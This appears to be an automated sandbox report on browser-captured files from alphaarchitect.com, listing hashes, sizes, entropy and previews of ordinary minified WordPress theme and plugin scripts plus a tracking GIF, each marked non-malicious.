                                                                                                                                                                                                                                                                        MD5:FB631E0265C73DDEE277C186FB1A38D9
                                                                                                                                                                                                                                                                        SHA1:364C28EF61B2C4C3264778D5B8680E9E70710261
                                                                                                                                                                                                                                                                        SHA-256:F8333C3E651FBB9A6C90182EDD058C4003328BA92DD0F3F4D2B7F0D9427AE4AB
                                                                                                                                                                                                                                                                        SHA-512:F5092D7D40AE2CD421143367A6FFAA7E9B7EC8A98C3EE3ADE7641741308A4AF4D508640CCEDC7C8510395C29D41A41162A5176B113E77C1067814EEE55C9C109
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-custom-header.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:function fusionDisableStickyHeader(){}function fusionInitStickyHeader(){}function getStickyHeaderHeight(i){return 0}function moveSideHeaderStylingDivs(){}function fusionSideHeaderScroll(){}
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2541), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2541
                                                                                                                                                                                                                                                                        Entropy (8bit):5.183290847271813
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:hBrL99kAAJ6rT99bi+BfKNY/IGTIffJmIpLD9cg15adkiIDlhB2fFWfoYZm9ZcM5:hv9N93pKNY/IGkffJmI5xakiIxhUquld
                                                                                                                                                                                                                                                                        MD5:A3B61A037278D8B392CBF89C25ABB51E
                                                                                                                                                                                                                                                                        SHA1:C4E8E93B95F835B81C064773DD7F6687B8EFC168
                                                                                                                                                                                                                                                                        SHA-256:B2F035B8A7FD26BEF558DF9C6759509369379BEA8A2899FD16B9643138A20B5A
                                                                                                                                                                                                                                                                        SHA-512:90D69FA5516F0EA5BA6240421112F8BBB17C1300439C7F5F51B2B4F3C9C8D156A491EBB9E8A4499D03ACAF00F0D131DC34892F128AB5CDF7F02E3D1D7CF4792C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:"object"!=typeof window.UM&&(window.UM={}),"object"!=typeof UM.common&&(UM.common={}),UM.common={tipsy:{init:function(){"function"==typeof jQuery.fn.tipsy&&(jQuery(".um-tip-n").tipsy({gravity:"n",opacity:1,live:"a.live",offset:3}),jQuery(".um-tip-w").tipsy({gravity:"w",opacity:1,live:"a.live",offset:3}),jQuery(".um-tip-e").tipsy({gravity:"e",opacity:1,live:"a.live",offset:3}),jQuery(".um-tip-s").tipsy({gravity:"s",opacity:1,live:"a.live",offset:3}))},hide:function(){"function"==typeof jQuery.fn.tipsy&&(jQuery(".um-tip-n").tipsy("hide"),jQuery(".um-tip-w").tipsy("hide"),jQuery(".um-tip-e").tipsy("hide"),jQuery(".um-tip-s").tipsy("hide"),jQuery(".um .tipsy").remove(),jQuery(".um-page .tipsy").remove())}},datetimePicker:{init:function(){jQuery(".um-datepicker:not(.picker__input)").each(function(){e=void 0!==(elem=jQuery(this)).attr("data-disabled_weekdays")&&""!=elem.attr("data-disabled_weekdays")&&JSON.parse(elem.attr("data-disabled_weekdays"));var e,t=null,i=(void 0!==elem.attr("data-ye
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1891), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1891
                                                                                                                                                                                                                                                                        Entropy (8bit):4.97698674208926
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:UPpqVyPmNQswIuTVOfkLQNpoBSrDqlALq79OMvIGFTwi6:UMVy5UXsapoorU9D6
                                                                                                                                                                                                                                                                        MD5:B6775FD782846BEBD764ABE9585B1CA9
                                                                                                                                                                                                                                                                        SHA1:B5E8252FE622934937CCAFD19ECDCA486C4385AD
                                                                                                                                                                                                                                                                        SHA-256:B60FC6EFF3C0B2EC5F6EE4857D149DC353D5E768C319F3E53D613AD2D0E04C06
                                                                                                                                                                                                                                                                        SHA-512:C1DEBE253C5941A10E34B8C5DB12940126729343ADFCC02D2D302814E341B5AE2876ABD8A64BD546072051F9D90756A9854A59D606EA7BA4BEE88F3E899F70A4
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-animations.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:function fusionSetAnimationData(i){"off"===fusionAnimationsVars.status_css_animations||cssua.ua.mobile&&"desktop_and_mobile"!==fusionAnimationsVars.status_css_animations?jQuery("body").addClass("dont-animate").removeClass("do-animate"):(jQuery("body").addClass("do-animate").removeClass("dont-animate"),void 0!==i&&void 0!==i.data.custom&&jQuery(window).initElementAnimations())}!function(i){"use strict";window.awbAnimationObservers={},i.fn.initElementAnimations=function(){i.each(window.awbAnimationObservers,function(n,t){i.each(t[0],function(i,n){t[1].unobserve(n)}),delete window.awbAnimationObservers[n]}),"IntersectionObserver"in window?i.each(fusion.getObserverSegmentation(i(".fusion-animated")),function(n){var t=fusion.getAnimationIntersectionData(n),e=new IntersectionObserver(function(n,a){i.each(n,function(n,a){var o,s,u,r,d,m=i(a.target),c=0;a.isIntersecting&&(d=!0,0!==t.threshold&&(i(window).height()<m.outerHeight()?i(window).height()/m.outerHeight()>a.intersectionRatio&&(d=!1):1>
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2670), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):2670
                                                                                                                                                                                                                                                                        Entropy (8bit):5.062559850999237
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:tAMJod1RDEfrM/+NE3dqiEN9uGXrUiXP6yP662fSpDEfX:+JiJ/6M6KpY
                                                                                                                                                                                                                                                                        MD5:383E2B4FBE45D38F45CE86BC1320B810
                                                                                                                                                                                                                                                                        SHA1:64ACC1A99BE659AB310A4371FF858DAD31F0BEC1
                                                                                                                                                                                                                                                                        SHA-256:C115876F20F61789F14DB9FF0BAB7A7130E64BDC8CBE27E50BFF42152C9374FA
                                                                                                                                                                                                                                                                        SHA-512:BE92D689917379BBDB70AEDAE32190BFD3FB6DEEE0E23C219B6D931F091A76666BE5D3249727509C1E909014CB6DA1E2C318CA97101756F38B81C8469FA18F78
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/libs/um-confirm/um-confirm.min.js?ver=1.0
                                                                                                                                                                                                                                                                        Preview:!function(t){var i,n={message:"",yes_label:"Yes",no_label:"No"},m={init:function(o){i=t.extend({},n,o),t(this).each(function(){t(this).data("options",i),m.build.apply(t(this),[i]),t(this).click(function(o){var i=t(this).data("options");t("#um_confirm_message").html(i.message),t("#um_confirm_button_yes").html(i.yes_label),t("#um_confirm_button_no").html(i.no_label),m.show.apply(this),o.stopPropagation()})})},build:function(o){m.is_builded.apply(this)||(t('<div id="um_confirm_block"></div>').appendTo("body").html('<div class="um_confirm"><div id="um_confirm_title">Confirmation</div><div id="um_confirm_message"></div><div id="um_confirm_buttons"><div id="um_confirm_button_yes" class="um_confirm_button">Yes</div><div id="um_confirm_button_no" class="um_confirm_button">No</div></div></div><div id="um_confirm_block_back"></div>'),t(document).on("click","#um_confirm_button_yes",function(){var o=t("#um_confirm_block").data("obj");m.yes.apply(o)}),t(document).on("click","#um_confirm_button_no",
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:GIF image data, version 87a, 1 x 1
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):35
                                                                                                                                                                                                                                                                        Entropy (8bit):3.066054462414549
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:M3SLlHh/:f/
                                                                                                                                                                                                                                                                        MD5:729C3007A8ED0597531B0C76D54A94BB
                                                                                                                                                                                                                                                                        SHA1:90FE9B8A8142548FDFAB29F59CB0A164A0EAEF81
                                                                                                                                                                                                                                                                        SHA-256:6A842EA462DACA2A0B5A0F5F25BCFC8E0059AC811CA6C6A1BC54E4D9119621C3
                                                                                                                                                                                                                                                                        SHA-512:AC44DA7F455BFAE52B883639964276026FB259320902AA813D0333E021C356A7B3E3537B297F9A2158E588C302987CE0854866C039D1BB0FFB27F67560739DB2
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://pluralism.themancav.com/iZn9gPK7nuntu8eyv63RovrtmPCro9/s6PeZ6ef+ovP9+Inzq7Xf8/27x7Olu4+is7uM+uHpl/Lh8pLv4buA
                                                                                                                                                                                                                                                                        Preview:GIF87a........jl...,...........D..;
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1016), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1016
                                                                                                                                                                                                                                                                        Entropy (8bit):5.101106804661301
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:6UP0VMVi9pi2VimXAMkuanjykPs7KqORoyiT4/TLzXpvquHsPNmTPzDszvrd/:EqU5YMAm5VTT47vxi1
                                                                                                                                                                                                                                                                        MD5:376AFF03C7A0C7EEB2AF259CE6BAA321
                                                                                                                                                                                                                                                                        SHA1:872E48E47B3088E2F25184A99EE5FD94B545F7F7
                                                                                                                                                                                                                                                                        SHA-256:ECFEAAA265FB6A8F4C9500103F18E092C119F934539A6C9E56A6F42A098E5E30
                                                                                                                                                                                                                                                                        SHA-512:974E1A65B3439218F70C7C12F875D9DF032EE99B4D5C10BD222000437A519B6CC96D99E6D0B46002AC261FC48AB2FF012CC388195BAC959DF051B5F4BBFD4A01
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:function avadaUpdateToTopPostion(){var o=avadaToTopVars.totop_position.split("_");o=2===o.length?"to-top-"+o[0]+" to-top-"+o[1]:"to-top-"+o[0],jQuery(".to-top-container").attr("class","to-top-container"),jQuery(".to-top-container").addClass(o)}jQuery(document).ready(function(){var o=0,a=jQuery("html").hasClass("ua-edge")||jQuery("html").hasClass("ua-safari-12")||jQuery("html").hasClass("ua-safari-11")||jQuery("html").hasClass("ua-safari-10")?"body":"html";jQuery(".fusion-top-top-link").on("click",function(o){o.preventDefault(),(cssua.ua.mobile&&-1!==avadaToTopVars.status_totop.indexOf("mobile")||!cssua.ua.mobile)&&jQuery(a).animate({scrollTop:0},1200,"easeInOutExpo")}),jQuery(window).on("scroll",function(){var a=jQuery(this).scrollTop();200<a&&(a>=o||1!==parseInt(avadaToTopVars.totop_scroll_down_only))?jQuery(".fusion-top-top-link").addClass("fusion-to-top-active"):jQuery(".fusion-top-top-link").removeClass("fusion-to-top-active"),o=a}),jQuery(window).on("updateToTopPostion",avadaUpdat
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (11569), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):11569
                                                                                                                                                                                                                                                                        Entropy (8bit):5.152502078570914
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:8HouCp34v17eGVAaB2CpZBJCCqCkR1mOW8OMGH5Z4I1V70xgY3X:2CGv17xX4CnBJUCf8OiI3Yn
                                                                                                                                                                                                                                                                        MD5:886C4C9015DF4FBED66A7F534F0C7F18
                                                                                                                                                                                                                                                                        SHA1:AF84CBD0D43E3674F22DEEC1A7D3F598E0D17F2B
                                                                                                                                                                                                                                                                        SHA-256:10120C1D412745CF45E72C094BD6FF7BB422F4E2B707701830867C4639D85DE3
                                                                                                                                                                                                                                                                        SHA-512:7EC96201B1284DCF2C8E8AA0144A898EC7FA7E914A9AC7EE018DC4B5C85D19E24D4736C5C89526317C48A3E9D0C7AE9B9E4908895129EEE7557851A2EB20E90C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/hcaptcha-for-forms-and-more/assets/js/apps/hcaptcha.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:(()=>{"use strict";function t(e){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(e)}function e(t){return function(t){if(Array.isArray(t))return r(t)}(t)||function(t){if("undefined"!=typeof Symbol&&null!=t[Symbol.iterator]||null!=t["@@iterator"])return Array.from(t)}(t)||n(t)||function(){throw new TypeError("Invalid attempt to spread non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}()}function n(t,e){if(t){if("string"==typeof t)return r(t,e);var n={}.toString.call(t).slice(8,-1);return"Object"===n&&t.constructor&&(n=t.constructor.name),"Map"===n||"Set"===n?Array.from(t):"Arguments"===n||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n)?r(t,e):void 0}}function r(t,e){(null==e||e>t.length)&&(e=t.length);for(var n=0,r=Array(e);n<e;n++)r[n]=t[n];return r}function o(t,e
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4736), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):4736
                                                                                                                                                                                                                                                                        Entropy (8bit):5.185210469000918
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:87ctmQUmNbEHSz3mQY12DfSgFxSiS18GHiX2EQ/bUFUvebNVK:KAWQY127xy1LS2EngoNVK
                                                                                                                                                                                                                                                                        MD5:49AB1107060459EC7FD9C909C582D5C0
                                                                                                                                                                                                                                                                        SHA1:8B867B54CF2D5D3FD27A86C4266EB890BDDED31B
                                                                                                                                                                                                                                                                        SHA-256:88097146861348EE171162A41B0E5308C98D3C903CF4AB9369FFD919ABFE8740
                                                                                                                                                                                                                                                                        SHA-512:A5EB1E00228AE60A2616391F58676137E96792C10A813B7FFE242B280FAFCBF3AC2269D73BA88D20182B749AA89A3793837CB9025B7E873A9E338DE6017D5CA5
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:var fusion={fusionResizeWidth:0,fusionResizeHeight:0,currentPostID:null,toBool:function(t){return 1===t||"1"===t||!0===t||"true"===t||"on"===t},restArguments:function(t,e){return e=null==e?t.length-1:+e,function(){for(var n,i=Math.max(arguments.length-e,0),o=Array(i),r=0;r<i;r++)o[r]=arguments[r+e];switch(e){case 0:return t.call(this,o);case 1:return t.call(this,arguments[0],o);case 2:return t.call(this,arguments[0],arguments[1],o)}for(n=Array(e+1),r=0;r<e;r++)n[r]=arguments[r];return n[e]=o,t.apply(this,n)}},debounce:function(t,e,n){var i,o,r,s,u,a=this;return r=function(e,n){i=null,n&&(o=t.apply(e,n))},(s=this.restArguments(function(s){return i&&clearTimeout(i),n?(u=!i,i=setTimeout(r,e),u&&(o=t.apply(this,s))):i=a.delay(r,e,this,s),o})).cancel=function(){clearTimeout(i),i=null},s},isSmall:function(){return Modernizr.mq("only screen and (max-width:"+fusionJSVars.visibility_small+"px)")},isMedium:function(){return Modernizr.mq("only screen and (min-width:"+(parseInt(fusionJSVars.visibi
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (37933)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):38056
                                                                                                                                                                                                                                                                        Entropy (8bit):5.156899563931149
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:I5veG0+6ihBBT+MGGgSEYBEZ9yEfRtEVQMGQO2SlT6qFOTH1:I5veGsacG7EGEZ9ytnO2SeV
                                                                                                                                                                                                                                                                        MD5:0F6D33ED6E785188AF9DA72B58D10C04
                                                                                                                                                                                                                                                                        SHA1:92E5ABF953E60C5D744988CEE7187AF2AF870E1F
                                                                                                                                                                                                                                                                        SHA-256:BDE6523969879EED5B8B9873E6D0E77114F8BF2761364289A3B8F7B0C6BBDD64
                                                                                                                                                                                                                                                                        SHA-512:99EB1AE381C971C79C62038F1D5CA56A60CB62CB70DC3E36F290BEC8A0F9C799A4A96EF057C87E01EA0C18EAEB0F2068788285165F9623DA5CD878BC82E351C8
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:/*! @vimeo/player v2.23.0 | (c) 2024 Vimeo | MIT License | https://github.com/vimeo/player.js */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):((e="undefined"!=typeof globalThis?globalThis:e||self).Vimeo=e.Vimeo||{},e.Vimeo.Player=t())}(this,function(){"use strict";function r(t,e){var n,r=Object.keys(t);return Object.getOwnPropertySymbols&&(n=Object.getOwnPropertySymbols(t),e&&(n=n.filter(function(e){return Object.getOwnPropertyDescriptor(t,e).enumerable})),r.push.apply(r,n)),r}function u(t){for(var e=1;e<arguments.length;e++){var n=null!=arguments[e]?arguments[e]:{};e%2?r(Object(n),!0).forEach(function(e){s(t,e,n[e])}):Object.getOwnPropertyDescriptors?Object.defineProperties(t,Object.getOwnPropertyDescriptors(n)):r(Object(n)).forEach(function(e){Object.defineProperty(t,e,Object.getOwnPropertyDescriptor(n,e))})}return t}function j(){j=function(){return a};var a={},e=Object.prototype,s=e.hasOwnPrope
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (14535), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):14535
                                                                                                                                                                                                                                                                        Entropy (8bit):5.042493840691545
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:UUQwQ9iEBOMDDpiu6BRLr9Bt7Bmc17uJmiJzq8hczAbG6lS:pQ8EFFiZBp9Btpeu8hcUho
                                                                                                                                                                                                                                                                        MD5:66322043C8339B539278E4E7495DE00C
                                                                                                                                                                                                                                                                        SHA1:B263A1B8EB5E1A1611A6E5B9F90B45FFB30DC54F
                                                                                                                                                                                                                                                                        SHA-256:8BDDDB85C67DE06D386303C707FA868B1F5409B4CB8667F49F0EBC11AF63B3DF
                                                                                                                                                                                                                                                                        SHA-512:F1D41164531CBC8746C7A228243DDB527B65C9B7F940872E316409C07D1D49EEC72DC8C9F6F86BE422374DBDB1074DFD940FDD7BA5D271B12DC5F13F4C50954B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:var fusionNavClickExpandBtn=function(e){var n="object"==typeof e&&"object"==typeof e.currentTarget?jQuery(e.currentTarget):jQuery(e),a=n.parent();a.toggleClass("expanded"),a.attr("aria-expanded","false"===a.attr("aria-expanded")?"true":"false"),n.attr("aria-expanded","false"===n.attr("aria-expanded")?"true":"false"),a.hasClass("expanded")?a.find("ul > li").find("> a, > button").removeAttr("tabindex"):a.find("ul > li").find("> a, > button").attr("tabindex","-1"),fusionNavMobilePosition(a[0])},fusionNavClickExpandSubmenuBtn=function(e){var n="object"==typeof e&&"object"==typeof e.target?jQuery(e.target):jQuery(e),a=n.closest("nav"),u=n.parent();if(a.hasClass("awb-menu_v-stacked")&&!a.hasClass("collapse-enabled")||a.hasClass("awb-submenu_v-stacked")&&!a.hasClass("collapse-enabled"))return fusionVerticalSubmenuDirection(u,n),void fusionNavClickExpandBtn(n);"object"==typeof e.target&&e.preventDefault(),a.hasClass("collapse-enabled")?(a.hasClass("awb-menu_mobile-accordion")&&u.siblings(".exp
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (417), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):417
                                                                                                                                                                                                                                                                        Entropy (8bit):4.769142915295247
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:A9zOtDHpYN1agI+wvpeGXzvXzDeyYN1yzOti1jzDeyYN1yzOti1V:Jpg1aVv0GXzvXzDW1YjzDW1YV
                                                                                                                                                                                                                                                                        MD5:E44F2BC78365AD8E43248A046EA6B0C7
                                                                                                                                                                                                                                                                        SHA1:CC43C525B6A08371A8C68F37A48B940A001191F1
                                                                                                                                                                                                                                                                        SHA-256:14F4C2F22D0161BAEFFDE711B7B3842DDE08F396A8ECF3E3C77149A1A872DA81
                                                                                                                                                                                                                                                                        SHA-512:5550D24E905DA1F83F23AAD06DFB849C8F008BD76CB089A640B3BE2EFFC0C3AE10F85946A125C3CACA8507F97E5FBE3FF51371C3AB84258A61B6DE3521CD74AB
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-crossfade-images.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:function fusionResizeCrossfadeImagesContainer(e){var i=0;e.find("img").each(function(){var e=jQuery(this).height();e>i&&(i=e)}),e.css("height",i)}jQuery(window).on("load",function(){jQuery(window).on("resize",function(){jQuery(".crossfade-images").each(function(){fusionResizeCrossfadeImagesContainer(jQuery(this))})}),jQuery(".crossfade-images").each(function(){fusionResizeCrossfadeImagesContainer(jQuery(this))})})
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1065), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1065
                                                                                                                                                                                                                                                                        Entropy (8bit):4.9854369651369215
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:I4q8myIuEg1z7bjOWu2PfAMkzPTCWubW0IaBOBFpRCb6ksE0DJQIaBOB3RCrFoD9:I4qxUGUoMEuK0Pb6Z1D+N2DrPgy
                                                                                                                                                                                                                                                                        MD5:5FC92291B11E1A8428498F6275444C81
                                                                                                                                                                                                                                                                        SHA1:78C548C05A1BEEE9E24E5C5A66B960BF4441903A
                                                                                                                                                                                                                                                                        SHA-256:2385F913A82B206CA3006852E56B03AD517AD7A3AA79A87BD37766616D21360B
                                                                                                                                                                                                                                                                        SHA-512:ADE1CDA9C14343B17454FB132A3B91C0370C37D637174CAA5AD40B472B6E5570C1467B4CD1665AECF16E758494E146DA85D61BDB1338D23A3033830AD0069567
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-column.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:function fusionInitStickyColumns(){"object"==typeof fusion&&"function"==typeof fusion.getHeight&&jQuery(".awb-sticky[data-sticky-offset]").each(function(){jQuery(this)[0].style.setProperty("--awb-sticky-offset",fusion.getHeight(jQuery(this).attr("data-sticky-offset"))+fusion.getAdminbarHeight()+"px")})}jQuery(document).ready(function(){jQuery(".fusion-image-hovers .hover-type-liftup.fusion-column-inner-bg").on({mouseenter:function(){var e=jQuery(this).closest(".fusion_builder_column");jQuery(this).css("z-index","4"),jQuery(this).siblings(".fusion-column-wrapper").css("z-index","5"),"none"!==e.css("filter")&&"auto"===e.css("z-index")&&(e.css("z-index","1"),e.attr("data-filter-zindex","true"))},mouseleave:function(){var e=jQuery(this).closest(".fusion_builder_column");jQuery(this).css("z-index",""),jQuery(this).siblings(".fusion-column-wrapper").css("z-index",""),"true"===e.data("filter-zindex")&&(e.css("z-index",""),e.removeAttr("data-filter-zindex"))}})}),jQuery(window).on("load fusion
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (18026), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):18031
                                                                                                                                                                                                                                                                        Entropy (8bit):5.3276032148469685
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:72VKrFEvwTVu6vo8M5AFZSOvRGt0X40GIV4wtoOS5WuKwLG5S7g6RT/2liJ:N2EVu6vo8M5AFfRG2nq5Wu0SBciJ
                                                                                                                                                                                                                                                                        MD5:1FFB73B14C96D3B4ADAA09E98D5BDF06
                                                                                                                                                                                                                                                                        SHA1:CB5364FC27BEC0951BAF69B8E2C38C11FEC74ECE
                                                                                                                                                                                                                                                                        SHA-256:230745EF2D704D2035A375273FAF058F0F64B1F4DAE17DD0D364782B92AD3FE5
                                                                                                                                                                                                                                                                        SHA-512:B24B0270CE8B96B98D153B07EFD330A3C2D11EF43EDA2A4BB300C356FF1F794DCF8A26C3DBB414C58F9BD45445054B5C16618B80A81FC5C425165E84D94BDC1B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:!function(e,t,n,o){var r=[],a={_version:"3.12.0",_config:{classPrefix:"",enableClasses:!0,enableJSClass:!0,usePrefixes:!0},_q:[],on:function(e,t){var n=this;setTimeout(function(){t(n[e])},0)},addTest:function(e,t,n){r.push({name:e,fn:t,options:n})},addAsyncTest:function(e){r.push({name:null,fn:e})}},i=function(){};i.prototype=a,i=new i;var s=[];function c(e,t){return typeof e===t}var l,d,u=n.documentElement,p="svg"===u.nodeName.toLowerCase();function f(e){var t=u.className,n=i._config.classPrefix||"";if(p&&(t=t.baseVal),i._config.enableJSClass){var o=new RegExp("(^|\\s)"+n+"no-js(\\s|$)");t=t.replace(o,"$1"+n+"js$2")}i._config.enableClasses&&(e.length>0&&(t+=" "+n+e.join(" "+n)),p?u.className.baseVal=t:u.className=t)}function m(e,t){if("object"==typeof e)for(var n in e)l(e,n)&&m(n,e[n]);else{var o=(e=e.toLowerCase()).split("."),r=i[o[0]];if(2===o.length&&(r=r[o[1]]),void 0!==r)return i;t="function"==typeof t?t():t,1===o.length?i[o[0]]=t:(!i[o[0]]||i[o[0]]instanceof Boolean||(i[o[0]]=ne
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):259
                                                                                                                                                                                                                                                                        Entropy (8bit):4.866127354389964
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:z8HpxIX/vDRmzVxlCMQwxDM1NrM+ocPoezGeR0MqCFsYM:zAjQvDQV3CMQiQ1h7ocPonMq0sh
                                                                                                                                                                                                                                                                        MD5:21D1750911E1A79DF73A03FB7D741C5B
                                                                                                                                                                                                                                                                        SHA1:7501E4B411B9C92B8C6012CFC7C0D6EEA738542B
                                                                                                                                                                                                                                                                        SHA-256:D3C19AF1E12BD11ABED887C1F9765AC0D1769669F5D649234EAD613E9D02B3C2
                                                                                                                                                                                                                                                                        SHA-512:93FD5567410B359E5B3CD161AC8A836674239898CE017B9F4727C3B3C453046BC2A88761511AEF071D48A3F308B79A25987CE363F27741348F0687AF6624A825
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-alert.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:jQuery(document).on("ready fusion-element-render-fusion_alert",function(e,n){(void 0!==n?jQuery('div[data-cid="'+n+'"]').find(".fusion-alert .close"):jQuery(".fusion-alert .close")).on("click",function(e){e.preventDefault(),jQuery(this).parent().slideUp()})})
